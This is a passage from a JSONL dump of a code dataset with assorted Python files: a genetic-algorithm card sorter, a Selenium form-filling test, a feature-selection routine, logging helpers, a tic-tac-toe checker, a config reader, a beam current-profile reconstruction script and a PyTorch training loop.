(abs(36 - addValue) + abs(360 - mulValue))\r\n\r\n    def mutate(self):\r\n        mutatedGene = randint(0,9)\r\n\r\n        if self.chromosome[mutatedGene] == 0:\r\n            self.chromosome[mutatedGene] = 1\r\n        else:\r\n            self.chromosome[mutatedGene] = 0\r\n\r\n        self.update()\r\n\r\n    def randomChromosome(self):\r\n        result = []\r\n\r\n        for k in range(10):\r\n            result.append(randint(0,1))\r\n\r\n        return result\r\n\r\n    def update(self):\r\n        self.fitness = self.fitnessFunction()\r\n\r\nclass Population:\r\n    def __init__(self, size):\r\n        self.population = []\r\n        self.size = size\r\n        self.generation = 1\r\n\r\n        for k in range(size):\r\n            organism = Organism()\r\n            self.population.append(organism)\r\n\r\n    def __str__(self):\r\n        result = \"Generation \" + str(self.generation) + \"\\n\"\r\n\r\n        for organism in self.population:\r\n            result += str(organism) + \"\\n\"\r\n\r\n        return result\r\n\r\n    def advanceGeneration(self):\r\n        bestOrganism = self.bestOrganism()\r\n        print(self.generation, bestOrganism)\r\n\r\n        for organism in range(self.size):\r\n            newOrganism = Organism(bestOrganism.chromosome[:])\r\n            newOrganism.mutate()\r\n            self.population[organism] = newOrganism\r\n\r\n        self.generation += 1\r\n\r\n    def bestOrganism(self):\r\n        result = self.population[0]\r\n\r\n        for organism in self.population:\r\n            if organism.fitness < result.fitness:\r\n                result = organism\r\n\r\n        return result\r\n\r\n    def averageFitness(self):\r\n        result = 0\r\n\r\n        for organism in self.population:\r\n            result += organism.fitness\r\n\r\n        return result / self.size\r\n\r\ndef main():\r\n    x = Population(3)\r\n    contSim = True\r\n\r\n    while(contSim):\r\n        if x.bestOrganism().fitness == 0:\r\n            contSim = False\r\n            print(x.bestOrganism())\r\n            print(x.bestOrganism().cardNotation())\r\n        else:\r\n            x.advanceGeneration()\r\n\r\nmain()\r\n","sub_path":"GeneticCardSort.py","file_name":"GeneticCardSort.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
{"seq_id":"232325176","text":"# Data Driven Testing to load all the quotes of Gideon to our website's database\n\nimport 
XLUtils\nfrom selenium import webdriver\n\n# For now I will not use the executable_path to access the Chrome webdriver\ndriver = webdriver.Chrome(\"E:/Madhu Chandra K/Software Testing/Test Automation/chromedriver.exe\")\ndriver.implicitly_wait(2)\ndriver.maximize_window()\n\ndriver.get(\"https://www-5d9f3c97e4fb4f546e733d76.recruit.eb7.io\")\ndriver.find_element_by_id(\"show-modal\").click()\n\npath = \"C:/Users/madhu/Desktop/e-bot7/Gideon.xlsx\" # Path of the excel file which has the Gideon quotes\n\nrows=XLUtils.getRowCount(path,'Quotes')\n\nfor r in range(2, rows+1): # As our excel data sheet has only 3 columns we need only one for loop to access the data\n author = XLUtils.readData(path, \"Quotes\", r, 1)\n quotes = XLUtils.readData(path, \"Quotes\", r, 2)\n\n driver.find_element_by_id(\"autorInput\").send_keys(author)\n driver.find_element_by_id(\"quoteInput\").send_keys(quotes)\n driver.find_element_by_xpath(\"/html/body/div/div/div/div[1]/div/div/div/div/div[3]/button[1]\").click()\n\n driver.implicitly_wait(5)\n\n if driver.title == \"e-bot7 - Sandbox\": # Since the success message after adding the quote is not displayd at the moment, I am using the title of the page for pass or fail assertion\n print(\"Test is a pass\")\n XLUtils.writeData(path, \"Quotes\", r, 3, \"Quote added successfully\") # To update the test result in the 3rd column in the same excel of the test is a pass\n else:\n print(\"Test is a fail\")\n XLUtils.writeData(path, \"Quotes\", r, 3, \"Quote not added\") # To update the test result in the 3rd column in the same excel if the test is a fail\n\n driver.find_element_by_id(\"show-modal\").click() # This is to add the next quote\n\ndriver.close()\ndriver.quit()\nprint(\"Test completed\")","sub_path":"DDT/DataDrivenTestCase.py","file_name":"DataDrivenTestCase.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"446507239","text":"# %load q03_rf_rfe/build.py\n# Default imports\nimport pandas as pd\nfrom collections import OrderedDict\n\ndata = pd.read_csv('data/house_prices_multivariate.csv')\n\nfrom sklearn.feature_selection import RFE\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# Your solution code here\ndef rf_rfe(data):\n X = data.iloc[:,:-1]\n y = data.iloc[:,-1]\n names = data.columns\n rfc = RandomForestClassifier()\n i = int(len(X.columns)/2)\n rfe = RFE(rfc,n_features_to_select= i ,step=1)\n rfe.fit(X,y)\n d = OrderedDict(zip(names,rfe.ranking_))\n top_features = []\n for k,v in d.items():\n if v == 1:\n top_features.append(k)\n return top_features\n\n\n","sub_path":"q03_rf_rfe/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"79287321","text":"import logging\nimport os.path\nimport time\n\n\"\"\"readme\n工具名称:\n 日志记录工具\n工具的功能:\n 实现日志记录到控制台或者文本\n工具的使用:\n 1、创建logger对象,此处提供两个对象的创建\n 1.1、创建默认的对象,同时打印到控制台和记录文本\n Logger = MyLogger(\"log_name\").getLogger()\n 1.2、创建控制台打印对象,不输出文本\n Logger = Console(\"log_name\").getLogger()\n 1.3、通过参数控制\n MyLogger类保留了一个参数output,可设值为:both,file,console,控制日志的输出方式\n 2、使用对象输出日志\n Logger.info(\"hello world\")\n 3、查看日志文件(如果有)\n 日志文件默认保存在工程目录下logs文件夹下\n\"\"\"\n\n\nclass MyLogger(logging.Logger):\n \"\"\"自定义logger对象,继承自logging.Logger,实现文件和控制台的输出\"\"\"\n # 首先重建一个logger对象\n __logger = None\n\n def __init__(self, name=\"logger\", output=\"both\", level=logging.DEBUG, console_level=logging.INFO, mode='a'):\n 
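# logging.getLogger returns the same instance for a given name, so constructing\n        # MyLogger twice with one name configures and reuses a single shared logger\n        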
self.__logger = logging.getLogger(name)\n # 设置logger的等级\n super().__init__(name)\n # 等级的设定既可以直接设置大写的英文,也可以设置为logging模块的内置属性,python会自动进行转换判断\n # 这里设置的是全局的level,后面可根据输出到文件和控制台设置相应的level\n # 注意这各会设置最低的等级,后续的设置只能比这个高\n self.__logger.setLevel(level)\n formatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\n\n if output in (\"both\", \"file\"):\n # 组织一个带时间戳的字符串作为日志文件的名字,实现每天记录一个日志文件\n date_time = time.strftime(\"%Y%m%d\", time.localtime(time.time()))\n log_path_str = os.path.join(os.path.abspath(os.path.join(os.getcwd(), \"\")), \"logs\")\n # python 在创建fileHandler时路径不存在会报FileNotFoundError,这里要新建下路径(而具体文件存不存在都时可以的,python会自动创建文件)\n if not os.path.exists(log_path_str):\n os.makedirs(log_path_str)\n\n log_name = os.path.join(log_path_str, date_time + '.log')\n # 创建一个logging输出到文件的handler并设置等级和输出格式\n # mode属性用于控制写文件的模式,w模式每次程序运行都会覆盖之前的logger,而默认的是a则每次在文件末尾追加\n fh = logging.FileHandler(log_name, mode)\n fh.setLevel(level)\n fh.setFormatter(formatter)\n # 给logger对象添加handler\n self.__logger.addHandler(fh)\n fh.close()\n if output in (\"both\", \"console\"):\n # 如果需要同时输出到控制台\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n ch.setLevel(console_level)\n self.__logger.addHandler(ch)\n ch.close()\n\n def getLogger(self):\n return self.__logger\n\n @property\n def name(self):\n return self.__logger.name\n\n @name.setter\n def name(self, name):\n self.__logger.name = name\n\n\nclass ConsoleLogger(MyLogger):\n def __init__(self, name=\"logger\", level=logging.DEBUG):\n super().__init__(name=name, level=level, output=\"console\")\n","sub_path":"util/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"88462025","text":"import copy\nimport numpy as np\nimport argparse\nfrom scipy.constants import c\nfrom socket import gethostname\n\nimport lasing\nimport analysis\nimport tracking\nimport config\nimport streaker_calibration\nimport image_and_profile as iap\nimport myplotstyle as ms\nimport elegant_matrix\n\nnp.random.seed(0)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--noshow', action='store_true')\nparser.add_argument('--save', type=str)\nparser.add_argument('--recon-gap', action='store_true')\nargs = parser.parse_args()\n\nms.closeall()\n\nconfig.fontsize=9\n\ncharge = 180e-12\n\ntitle_fs = config.fontsize\nms.set_fontsizes(title_fs)\niap.absolute_ScreenProfile = True\n\nelegant_matrix.set_tmp_dir('~/tmp_elegant/')\n\n\nhostname = gethostname()\nif hostname == 'desktop':\n data_dir2 = '/storage/data_2021-05-19/'\nelif hostname == 'pc11292.psi.ch':\n data_dir2 = '/sf/data/measurements/2021/05/19/'\nelif hostname == 'pubuntu':\n data_dir2 = '/mnt/data/data_2021-05-19/'\ndata_dir1 = data_dir2.replace('19', '18')\n\nblmeas_file = data_dir1+'119325494_bunch_length_meas.h5'\n\nn_streaker = 1\nplot_gap_recon = True\n\nif plot_gap_recon:\n recon_gap = True\n\ngauss_kwargs = config.get_default_gauss_recon_settings()\ngauss_kwargs['charge'] = charge\ntracker_kwargs = config.get_default_tracker_settings()\n\nblmeas_file = data_dir1+'119325494_bunch_length_meas.h5'\nblmeas_profile = iap.profile_from_blmeas(blmeas_file, gauss_kwargs['tt_halfrange'], gauss_kwargs['charge'], 0, True)\nblmeas_profile.cutoff2(0.03)\nblmeas_profile.crop()\nblmeas_profile.reshape(1000)\n\nsc = streaker_calibration.StreakerCalibration('Aramis', 1, 10e-3, charge)\nfor scf in (data_dir1+'2021_05_18-23_07_20_Calibration_SARUN18-UDCP020.h5', 
data_dir1+'2021_05_18-23_32_12_Calibration_SARUN18-UDCP020.h5'):\n sc.add_file(scf)\n\nsc.fit_type('centroid')\n\ntracker_kwargs = config.get_default_tracker_settings()\nrecon_kwargs = config.get_default_gauss_recon_settings()\nrecon_kwargs['charge'] = charge\ntracker = tracking.Tracker(**tracker_kwargs)\ntracker.set_simulator(sc.meta_data)\n\noffset_dict = sc.fit_type('centroid')\nstreaker_offset = offset_dict['streaker_offset']\nindex = -1\nmeas_screen = sc.get_meas_screens()[index]\nmeas_screen.cutoff2(tracker.screen_cutoff)\nmeas_screen.crop()\nmeas_screen.reshape(tracker.len_screen)\n\n\nif recon_gap:\n gap_arr = np.array([10e-3-100e-6, 10e-3+0e-6])\n use_offsets = [0, 1, 2, 3, 12, 13, 14, 15]\n gap_recon_dict = sc.gap_reconstruction2(gap_arr, tracker, recon_kwargs, streaker_offset, gap0=10e-3, use_offsets=use_offsets)\n print('assumed_bunch_duration %.2f' % (gap_recon_dict['beamsize']*1e15))\n print('assumed_bunch_uncertainty %.2f' % (gap_recon_dict['beamsize_rms']*1e15))\n delta_gap = gap_recon_dict['gap'] - 10e-3\n\n gap_arr = gap_recon_dict['gap_arr']\n beamsize_arr = gap_recon_dict['all_rms'].mean(axis=1)\n beamsize_plus = gap_recon_dict['beamsize'] + gap_recon_dict['beamsize_rms']\n beamsize_minus = gap_recon_dict['beamsize'] - gap_recon_dict['beamsize_rms']\n sort = np.argsort(gap_arr)\n gap_plus = np.interp(beamsize_plus, beamsize_arr[sort], gap_arr[sort])\n gap_minus = np.interp(beamsize_minus, beamsize_arr[sort], gap_arr[sort])\n print('Gap plus / minus, %.2f, %.2f' % (gap_plus*1e6, gap_minus*1e6))\n\n\nelse:\n delta_gap = -63e-6\nprint('Delta gap %i um' % (delta_gap*1e6))\n\n\ntracker_kwargs = config.get_default_tracker_settings()\nrecon_kwargs = config.get_default_gauss_recon_settings()\ntracker = tracking.Tracker(**tracker_kwargs)\ntracker.set_simulator(sc.meta_data)\n\nrecon_kwargs['gaps'] = [10e-3, 10e-3+delta_gap]\nrecon_kwargs['beam_offsets'] = [0., -(sc.offsets[index] - streaker_offset)]\nrecon_kwargs['n_streaker'] = 1\nrecon_kwargs['meas_screen'] = meas_screen\nrecon_kwargs['charge'] = charge\n\n\nhspace, wspace = 0.40, 0.35\nfig = ms.figure('Current profile reconstruction', figsize=(13, 6))\nms.plt.subplots_adjust(hspace=hspace, wspace=wspace)\nsubplot = ms.subplot_factory(2, 4, grid=False)\nsp_ctr = 1\n\n\nwhere0 = np.argwhere(sc.offsets == 0).squeeze()\nxlim = -3e-3, 1e-3\nylim = 1e-3, 5e-3\nfor img_index, title in [(index, '(b) Streaked'), (where0, '(a) Unstreaked')][::-1]:\n raw_image = sc.plot_list_image[img_index]\n\n x_axis = sc.plot_list_x[img_index]\n y_axis = sc.y_axis_list[img_index]\n\n img = iap.Image(raw_image, x_axis, y_axis)\n sp_img = subplot(sp_ctr, title=title, xlabel='x (mm)', ylabel='y (mm)', title_fs=title_fs)\n sp_ctr += 1\n img.plot_img_and_proj(sp_img, xlim=xlim, ylim=ylim, plot_gauss=False)\n sumx = raw_image.sum(axis=0)\n prof = iap.AnyProfile(x_axis, sumx-np.min(sumx))\n prof.cutoff2(3e-2)\n prof.crop()\n prof.reshape(5e3)\n x_rms = prof.rms()\n x_gf = prof.gaussfit.sigma\n distance = sc.gap0/2. 
- abs(sc.offsets[img_index])\n print('%s RMS: %i um; Gauss sigma: %i um, d=%i um' % (title, round(x_rms*1e6), round(x_gf*1e6), round(distance*1e6)))\n if img_index == where0:\n unstreaked_beamsize = x_gf\n\nsp_profile, sp_screen = [subplot(x+3, grid=False) for x in range(2)]\nsp_opt = sp_moments = sp_dummy = lasing.dummy_plot()\nsp_ctr += 2\n\nfor sp, title, xlabel, ylabel in [\n (sp_profile, '(c) Profile reconstruction', 't (fs)', 'I (kA)'),\n (sp_screen, '(d) Screen reconstruction', 'x (mm)', config.rho_label),\n #(sp_opt, 'Optimization', 'Gaussian $\\sigma$ (fs)', 'Opt value'),\n #(sp_moments, 'Transverse moments', 'Gaussian $\\sigma$ (fs)', r'$\\left|\\langle x \\rangle\\right|$, $\\sqrt{\\langle x^2\\rangle}$ (mm)'),\n ]:\n sp.clear()\n sp.set_title(title, fontsize=title_fs)\n sp.set_xlabel(xlabel)\n sp.set_ylabel(ylabel)\n\nplot_handles = sp_screen, sp_profile, sp_opt, sp_moments\n\ntracker.gauss_prec=1e-15\n\noutp = analysis.current_profile_rec_gauss(tracker, recon_kwargs, do_plot=False)\nanalysis.plot_rec_gauss(outp, plot_handles, [blmeas_profile], both_zero_crossings=False, skip_indices=(2,))\ntracker.gauss_prec=0.5e-15\n\n#sp_screen.get_legend().remove()\n#sp_profile.get_legend().remove()\n\n\nsp_screen_pos = subplot(sp_ctr, title='(e) Distance scan', xlabel='x (mm)', ylabel=config.rho_label)\nsp_ctr += 1\nsp_profile_pos = subplot(sp_ctr, title='(f) Profile comparison', xlabel='t (fs)', ylabel='I (kA)')\nsp_ctr += 1\n\nplot_handles = None, (lasing.dummy_plot(), sp_screen_pos, lasing.dummy_plot(), sp_profile_pos)\nbeam_offsets, _ = sc.reconstruct_current(tracker, copy.deepcopy(recon_kwargs), force_gap=recon_kwargs['gaps'][1])\nsc.plot_reconstruction(plot_handles=plot_handles, blmeas_profile=blmeas_profile, max_distance=300e-6)\nsc.plot_reconstruction(plot_handles=None, blmeas_profile=blmeas_profile, max_distance=np.inf)\n\n#sp_screen_pos.get_legend().remove()\n#sp_profile_pos.get_legend().remove()\n\n\n\n\ngap = recon_kwargs['gaps'][1]\nbeam_offset = recon_kwargs['beam_offsets'][-1]\nstruct_length = 1\n\n\ngauss_kwargs = config.get_default_gauss_recon_settings()\ntracker_kwargs = config.get_default_tracker_settings()\nn_emittance = 300e-9\ntracker_kwargs['n_emittances'] = [n_emittance, n_emittance]\n\ntracker = tracking.Tracker(**tracker_kwargs)\n\n\n\n#blmeas_profile.plot_standard(sp_profile_pos, color='black', ls='--')\n\n#ms.figure('Resolution', figsize=(10, 8))\n#ms.plt.subplots_adjust(hspace=0.4, wspace=0.8)\n#subplot = ms.subplot_factory(2,3, grid=False)\nms.plt.figure(fig.number)\n\n#image_file = data_dir1+'2021_05_18-21_02_13_Lasing_False_SARBD02-DSCR050.h5'\n#image_dict = h5_storage.loadH5Recursive(image_file)\n#meta_data1 = image_dict['meta_data_begin']\n\n#images = image_dict['pyscan_result']['image'].astype(float)\n#x_axis = image_dict['pyscan_result']['x_axis_m'] - screen_x0\n#y_axis = image_dict['pyscan_result']['y_axis_m']\n#projx = images.sum(axis=-2)\n#median_index = misc.get_median(projx, method='mean', output='index')\n#raw_image1 = images[median_index]\n#raw_image1 -= np.median(raw_image1)\n#image1 = iap.Image(raw_image1, x_axis, y_axis)\n\n\n#strong_streaking_file = data_dir1+'2021_05_18-23_43_39_Lasing_False_SARBD02-DSCR050.h5'\n#strong_streaking_dict = h5_storage.loadH5Recursive(strong_streaking_file)\n#meta_data2 = strong_streaking_dict['meta_data_begin']\n#\n#strong_calib_file = data_dir1+'2021_05_18-23_32_12_Calibration_SARUN18-UDCP020.h5'\n#strong_calib_dict = h5_storage.loadH5Recursive(strong_calib_file)\n#screen_x0 = 
strong_calib_dict['meta_data']['screen_x0']\n#index = np.argwhere(strong_calib_dict['meta_data']['offsets'] == 0)\n#raw_image = ((strong_calib_dict['raw_data']['pyscan_result']['image'])[index,0]).astype(float).squeeze()\n#raw_image2 = ((strong_calib_dict['raw_data']['pyscan_result']['image'])[0,0]).astype(float).squeeze()\n#x_axis = strong_calib_dict['raw_data']['pyscan_result']['x_axis_m'] - screen_x0\n#y_axis = strong_calib_dict['raw_data']['pyscan_result']['y_axis_m']\n#calib_image2 = iap.Image(raw_image, x_axis, y_axis)\n#image2 = iap.Image(raw_image2, x_axis, y_axis)\n\n\n\nmeta_data = sc.meta_data\ntracker.set_simulator(meta_data)\nblmeas_profile.energy_eV = tracker.energy_eV\ntracker.override_quad_beamsize = False\n#tracker.n_emittances = [200e-9, 200e-9]\n\nif plot_gap_recon:\n sp_gap = subplot(sp_ctr, title='(g) Gap reconstruction', xlabel='$\\Delta$ d ($\\mu$m)', ylabel='rms bunch duration (fs)', title_fs=title_fs)\n sp_profile1 = sp_dummy\nelse:\n sp_gap = subplot(sp_ctr, title='(g) Profile and wake', xlabel='t (fs)', ylabel='Wake (MV/m)', title_fs=title_fs)\n sp_profile1 = sp_gap.twinx()\nsp_ctr += 1\n\nsp_res = subplot(sp_ctr, title='(h) Resolution', xlabel='t (fs)', ylabel='R (fs)', title_fs=title_fs)\nsp_ctr += 1\nsp_profile = sp_res.twinx()\n\n\nblmeas_profile.plot_standard(sp_profile1, color='black', ls='--')\nblmeas_profile.plot_standard(sp_profile, color='black', ls='--', label='I(t)')\n\nsp_profile1.set_yticklabels([])\nsp_profile1.set_yticks([])\nsp_profile.set_yticks([])\n\nfor ctr, (distance, color_ctr) in enumerate([(231e-6, 2), (294e-6, 0)]):\n beam_offset = gap/2. - distance\n wake_dict = blmeas_profile.calc_wake(gap, beam_offset, struct_length)\n wake_t = wake_dict['input']['charge_xx']/c + blmeas_profile.time.min()\n wake_E = wake_dict['dipole']['wake_potential']\n if not plot_gap_recon:\n color = sp_gap.plot(wake_t*1e15, np.abs(wake_E)/1e6, label='%i' % (distance*1e6))[0].get_color()\n else:\n color = ms.plt.rcParams['axes.prop_cycle'].by_key()['color'][color_ctr]\n\n tracker.n_particles = int(200e3)\n emittances = [tracker.fit_emittance(unstreaked_beamsize, 20e-6, 200e-15), 200e-9]\n emittances = [200e-9]\n print('Emittance X set to %i nm' % (tracker.n_emittances[0]*1e9))\n res_dicts = []\n for emit_ctr, n_emittance in enumerate(emittances):\n for q_ctr, quad_wake in enumerate([True, False]):\n ls = [None, 'dotted'][q_ctr]\n tracker.n_emittances[0] = n_emittance\n tracker.quad_wake = quad_wake\n res_dict = iap.calc_resolution(blmeas_profile, gap, beam_offset, struct_length, tracker, 1)\n res = res_dict['resolution']\n res_t = res_dict['time']\n\n if q_ctr == 0:\n label = '%i' % (round(distance*1e6))\n else:\n label = None\n mask = res<10e-15\n sp_res.plot(res_t[mask]*1e15, res[mask]*1e15, label=label, color=color, ls=ls)\n res_dicts.append(res_dict)\n\nsp_res.set_ylim(0, 10)\n#sp_res.legend(title='d ($\\mu$m)', loc='upper right')\nms.comb_legend(sp_res, sp_profile, title='d ($\\mu$m)', loc='upper right')\n\nif recon_gap:\n if plot_gap_recon:\n plot_handles = (sp_gap, sp_dummy, sp_dummy, sp_dummy)\n else:\n plot_handles = None\n sc.plot_gap_reconstruction(gap_recon_dict, plot_handles=plot_handles, exclude_gap_ctrs=(2,))\n sc.plot_gap_reconstruction(gap_recon_dict)\n old_lim = sp_gap.get_xlim()\n sp_gap.set_xlim([old_lim[0], old_lim[1]+80])\n\nif not args.noshow:\n ms.show()\n\nif args.save:\n ms.saveall(args.save, hspace, wspace, 
ending='.pdf')\n\n","sub_path":"063f_current_recon.py","file_name":"063f_current_recon.py","file_ext":"py","file_size_in_byte":11780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"5475729","text":"# -*- coding:utf-8 -*-\n# python version= python3.X\n# code lines count about 60\nimport os\nimport logging\nimport datetime\n\n\nclass _MyLoggerMaker(object):\n \"\"\"this is a logger maker class, to use function 'create_logger' you will get a special logger\n when this logger work ,it will create the dir by the primary 'name' you send in.\n the log file name is define by date auto and the primary 'name'.\n last ,we don't support console printer. just file writer.\n \"\"\"\n\n def __init__(self):\n \"\"\" there is the config information ,after you create an object you can also change it\n by self.attribute name. And then through by function 'create_logger',you can get the\n logger you need.\n \"\"\"\n self.level = logging.INFO\n self.format = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s'\n self.datefmt = '%a, %d %b %Y %H:%M:%S'\n self.filemode = 'w'\n\n def _create_logger(self, name):\n \"\"\"\n this is a function to help you get a logger you need.\n :param name:\n :return:logger object\n \"\"\"\n date = datetime.date.today()\n log_dir = os.path.dirname(os.path.dirname(__file__)) + '/logs/{}'.format(name)\n if not os.path.exists(log_dir):\n os.mkdir(log_dir)\n log_path = os.path.join(log_dir, '{}:{}.log'.format(name, date))\n # print(log_path)\n # create logger handler to achieve write different log information into different log file\n handler = logging.FileHandler(log_path)\n logging.basicConfig(level=self.level,\n format=self.format,\n datefmt=self.datefmt,\n # filename=log_path,\n filemode=self.filemode)\n handler_format = logging.Formatter(fmt=self.format, datefmt=self.datefmt)\n handler.setFormatter(handler_format)\n\n logger = logging.getLogger(name)\n # add handler into logger\n logger.addHandler(handler)\n return logger\n\n\n_maker = _MyLoggerMaker()\n\nvideologger = _maker._create_logger(\"video\")\nmusiclogger = _maker._create_logger(\"music\")\nnovellogger = _maker._create_logger(\"novel\")\n\n\nif __name__ == '__main__':\n # maker = MyLoggerMaker()\n # mylogger = maker.create_logger(\"default\")\n # mylogger.info(\"xixixixxi\")\n pass\n","sub_path":"customTools/loggerHome.py","file_name":"loggerHome.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"95201290","text":"__author__ = 'KoicsD'\n\n\ndef det(num_pairs):\n return num_pairs[0][0] * num_pairs[1][1] - num_pairs[0][1] * num_pairs[1][0]\n\ndef diff(num_pair1, num_pair2):\n return (num_pair1[0] - num_pair2[0], num_pair1[1] - num_pair2[1])\n\ndef pos_vectors(num_pairs, origin):\n ret = []\n for pair in num_pairs:\n ret.append(diff(pair, origin))\n return ret\n\ndef rmv(lst, to_remove):\n ret = []\n for element in lst:\n if element != to_remove:\n ret.append(element)\n return ret\n\ndef is_winner(num_pairs):\n for pair in num_pairs:\n new_pairs = rmv(num_pairs, pair)\n positions = pos_vectors(new_pairs, pair)\n for i in range(len(positions)):\n for j in range(i):\n if det((positions[i], positions[j])) == 0:\n return True\n return False\n\ndef get_num_pairs(game_result, ch):\n ret = []\n for i in range(3):\n for j in range(3):\n if game_result[i][j] == ch:\n ret.append((i, j))\n return ret\n\ndef checkio(game_result):\n x_pairs = 
get_num_pairs(game_result, \"X\")\n o_pairs = get_num_pairs(game_result, \"O\")\n if is_winner(x_pairs):\n return \"X\"\n elif is_winner(o_pairs):\n return \"O\"\n else:\n return \"D\"\n\nif __name__ == '__main__':\n print(checkio([\n \"OO.\",\n \"XOX\",\n \"XOX\"]))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio([\n \"X.O\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins\"\n assert checkio([\n \"OO.\",\n \"XOX\",\n \"XOX\"]) == \"O\", \"Os wins\"\n assert checkio([\n \"OOX\",\n \"XXO\",\n \"OXX\"]) == \"D\", \"Draw\"\n assert checkio([\n \"O.X\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins again\"\n","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"512518685","text":"def l1_reg(model):\n \"\"\"\n Inputs: Pytorch model\n This function calculates the l1 norm of the all the tensors in the model\n \"\"\"\n l1 = 0.0\n\n for param in model.parameters():\n l1 += torch.sum(torch.abs(param))\n\n return l1\n\n# add event to airtable\natform.add_event('Coding Exercise 1.1: L1 Regularization')\n\nset_seed(seed=SEED)\n## uncomment to test\nnet = nn.Linear(20, 20)\nprint(f\"L1 norm of the model: {l1_reg(net)}\")","sub_path":"tutorials/W1D5_Regularization/solutions/W1D5_Tutorial2_Solution_f9f318de.py","file_name":"W1D5_Tutorial2_Solution_f9f318de.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"44283539","text":"conf_file = \"NeutronBrain.conf\"\ndef Del_Space(x):\n return x.rstrip(\" \").strip(\" \")\n\ndef Read_Conf(key=\"ALL\"):\n with open(conf_file, \"r\") as oke:\n oke = oke.read()\n conf = {}\n temp0 = oke.split(\"\\n\")\n #remove space and seperate \"=\" \n temp0 = list(filter(lambda x: not \"#\" in x, map(lambda x: x.rstrip(\" \").strip(\" \"), temp0))) \n for i in temp0:\n if (not \"=\" in i):\n continue\n a = i.split(\"=\")\n conf[Del_Space(a[0])] = Del_Space(a[1])\n if (key==\"ALL\"):\n return conf\n else:\n try:\n return conf[key]\n except Exception as err:\n print(err)\ndef Read_Conf_List(key=\"ALL\"):\n return list(map(lambda x: x.replace(\" \", \"\"), Read_Conf(key).split(\",\")))\n","sub_path":"NeutronBrain_Files/NeutronBrain_API/conf/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"231507028","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport time\nimport copy\nfrom tqdm import tqdm\n\n\ndef rmse_score(true, pred):\n return torch.sqrt(torch.mean((true - pred) ** 2))\n\n\ndef warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor):\n def f(x):\n if x >= warmup_iters:\n return 1\n alpha = float(x) / warmup_iters\n return warmup_factor * (1 - alpha) + alpha\n\n return torch.optim.lr_scheduler.LambdaLR(optimizer, f)\n\n\nWARMUP_EPOCH = 1\ndef train_one_epoch(model, opt, dataloader, loss_fn, device, epoch, max_batch_size):\n model.train()\n losses = {\"mse\": 0}\n\n lr_scheduler = None\n if epoch < WARMUP_EPOCH:\n warmup_factor = 1. 
/ 1000\n warmup_iters = min(1000, len(dataloader) - 1)\n lr_scheduler = warmup_lr_scheduler(opt, warmup_iters, warmup_factor)\n\n for imgs, keypoints in tqdm(dataloader):\n imgs = imgs.float().to(device)[: max_batch_size]\n keypoints = torch.from_numpy(keypoints).float().to(device)[: max_batch_size]\n keypoints = torch.cat([keypoints, keypoints, keypoints])\n\n opt.zero_grad()\n pred = model(imgs)\n pred = torch.cat(pred)\n if loss_fn is not None:\n loss = loss_fn(pred, keypoints)\n else:\n loss = F.mse_loss(pred, keypoints)\n loss.backward()\n opt.step()\n\n losses[\"mse\"] += loss.item()\n\n if lr_scheduler is not None:\n lr_scheduler.step()\n losses[\"mse\"] /= len(dataloader)\n return losses\n\n\n@torch.no_grad()\ndef evaluate(model, dataloader, loss_fn, device, max_batch_size):\n model.train()\n losses = {\"mse\": 0}\n\n for imgs, keypoints in tqdm(dataloader):\n imgs = imgs.float().to(device)[: max_batch_size]\n keypoints = torch.from_numpy(keypoints).float().to(device)[: max_batch_size]\n keypoints = torch.cat([keypoints, keypoints, keypoints])\n\n pred = model(imgs)\n pred = torch.cat(pred)\n if loss_fn is not None:\n loss = loss_fn(pred, keypoints)\n else:\n loss = F.mse_loss(pred, keypoints)\n\n losses[\"mse\"] += loss.item()\n\n losses[\"mse\"] /= len(dataloader)\n return losses\n\n\nSAVE_INTERVAL = 5\ndef train_model(model, opt, scheduler, loss_fn, device, save_dir, start_epoch, end_epoch,\n train_dataloader, valid_dataloader, max_batch_size):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_loss = 100.\n\n train_losses = {\"mse\": []}\n valid_losses = {\"mse\": []}\n\n #cudnn.benchmark = True\n for epoch in range(start_epoch, end_epoch + 1):\n print(\"\\n\" + \"=\" * 40)\n print(\"Epoch {}/{}\".format(epoch, end_epoch))\n\n train_loss = train_one_epoch(model, opt, train_dataloader, loss_fn, device, epoch, max_batch_size)\n print(\"\\nTrain Loss\")\n print(\"\\t mse: {:.6f}\".format(train_loss[\"mse\"]))\n for key in train_losses:\n train_losses[key].append(train_loss[key])\n\n if scheduler is not None:\n scheduler.step()\n\n valid_loss = evaluate(model, valid_dataloader, loss_fn, device, max_batch_size)\n print(\"\\nValid Loss\")\n print(\"\\t mse: {:.6f}\".format(valid_loss[\"mse\"]))\n for key in valid_losses:\n 